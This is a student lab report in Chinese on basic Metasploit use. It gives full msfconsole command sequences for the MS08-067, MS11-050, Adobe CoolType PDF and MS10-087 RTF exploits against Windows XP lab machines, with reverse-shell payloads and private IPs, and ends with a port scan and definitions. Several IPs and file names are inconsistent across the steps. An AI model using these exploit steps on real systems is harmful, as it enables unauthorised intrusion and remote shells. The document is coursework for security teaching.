zoukankan      html  css  js  c++  java
  • 网络对抗技术 2017-2018-2 20152515 Exp5 MSF基础应用

    1.实践内容(3.5分)

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。


    1.1一个主动攻击实践,如ms08_067; (1分)

    MS08-067漏洞攻击

    这次使用Metaploit框架中的MS08_067渗透攻击模块对windows XP SP3(English)(没有使用DEF和ASLR安全防护机制)靶机进行渗透测试。

    • 攻击机:kali
    • 靶机:windows XP SP3(English)

    指令如下所示:

    msfconsole
    search ms08_067
    use exploit/windows/smb/ms08_067_netapi
    set payload generic/shell_reverse_tcp
    set LHOST 192.168.46.132  //攻击机IP
    set LPORT 5215    //设置端口号
    set RHOST 192.168.46.133 //靶机IP
    set target 0   //自动选择目标系统类型,匹配度较高
    exploit  
    


    连接成功:

    可以看到下图中“192.168.46.133”即靶机的IP地址,所以攻击成功:


    1.2 一个针对浏览器的攻击,如ms11_050;(1分)

    浏览器渗透攻击——MS11-050

    • 攻击机:kali
    • 靶机:WindowsXP Professional sp2

    输入如下指令,首先进入控制台:

    msfconsole
    use windows/browser/ms11_050_mshtml_cobjectelement
    set payload generic/shell_reverse_tcp
    set LHOST 192.168.46.132
    set LPORT 5215
    set URIPATH 20155215
    exploit
    

    访问http://192.168.130.130:8080/2015d,网页出现如下的内容:

    连接成功:


    1.3 一个针对客户端的攻击,如Adobe,Office;(1分)

    A.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 攻击机:kali
    • 靶机:windowsXP Professional sp2
    • Adobe版本:9.3
    > use windows/fileformat/adobe_cooltype_sing
    > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    > set LHOST 192.168.130.130 //攻击机ip
    > set LPORT 5303 //攻击端口
    > set FILENAME 20155303-2.pdf //设置生成pdf文件的名字
    > exploit //攻击
    
    

    生成了名为“20155215”的PDF文件:

    将生成的pdf文件拷贝到靶机上。
    在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    图中的“192.168.46.134”即为靶机的IP地址,也就是说攻击成功:

    B.针对Office软件的渗透攻击——MS10-087

    • 攻击机:kali
    • 靶机:windowsXP Professional sp2
    • Office版本:2003
    msfconsole
    use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    set payload windows/exec
    set CMD calc.exe
    exploit
    

    使用show options命令查看一些参数值,比如文件名、绑定程序等等。

    将生成的文件从/root/.msf4/local/msf.rft拷贝到靶机上,并使用Office2003打开。

    不管第几次打开,都会提示错误:

    然后我们可以看到计算器自动打开了,攻击成功:


    1.4 成功应用任何一个辅助模块。(0.5分)

    我用的是auxiliary/scanner/portscan/tcp

    指令如下所示:

    show auxiliary
    use auxiliary/scanner/portscan/tcp
    show options 
    set RHOSTS 192.168.46.135
    set THREADS 15
    exploit
    

    show auxiliary 之后出现下面的各种辅助模块,我选的就是红框框出的:

    show options可以让我们查看有哪些参数项:

    设置相关参数如下:

    连接成功,可以看到TCP端口开放:


    2.1.基础问题回答

    用自己的话解释什么是exploit,payload,encode.
    答:

    • exploit是攻击模块,工作原理就是利用发现的安全漏洞对目标系统进行攻击,植入并运行攻击载荷,从而获得对远程目标系统访问权的。
    • payload payload,即载荷,应该是指在程序中起关键作用的代码,通常作为攻击者打开会话连接的有效载荷,用于渗透攻击等。
    • encode指的是可以对一段代码进行编码,改变其代码特征,但是不改变其本质。

    2.2.实践总结与体会

    这次的实验乍一看感觉有点复杂,真的去做了之后觉得还行。主要是因为我们是“站在巨人的肩膀”上,是以已知的方式攻击已经被发现的漏洞,所以就感觉不会太困难的。但是做最后一个任意模块的时候,就需要自己动脑筋啦,因为要跟别人不一样,所以我还是花了一点心思,感觉还是很有收获的。

  • 相关阅读:
    java内嵌ftp服务器
    echostudio3 破解
    替换java中资源文件类
    使用Apache FtpServer搭建FTP服务器
    创建一个输入标识符 也就是一个输入的光标
    vbscript操作文件
    vbscript操作文件
    echostudio3 破解
    js做一个简易计算器
    js函数,传入原文,返回密文
  • 原文地址:https://www.cnblogs.com/xuanyan/p/8862663.html
Copyright © 2011-2022 走看看